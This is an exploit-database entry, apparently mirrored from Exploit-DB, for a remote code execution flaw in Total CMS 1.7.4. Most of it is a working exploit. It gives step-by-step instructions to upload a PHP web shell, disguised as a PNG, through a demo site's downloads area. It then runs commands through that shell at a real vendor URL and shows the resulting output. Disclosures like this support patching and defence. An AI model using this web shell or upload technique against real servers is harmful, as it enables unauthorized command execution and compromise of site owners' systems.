[] NeoSense
E X P L O I T S
title author type platform port cve id

Total CMS 1.7.4 - Remote Code Execution (RCE)

Author: tmrswrr
type: webapps
platform: php
port: 
date_added: 2023-06-04 
date_updated: 2023-06-04 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click edit page button
https://www.totalcms.co/demo/soccer/
2)After go down and will you see downloads area
3)Add in this area shell.php file


?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND

4) After open this file and write commands

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result :

?PNG ...

uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

IEND
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.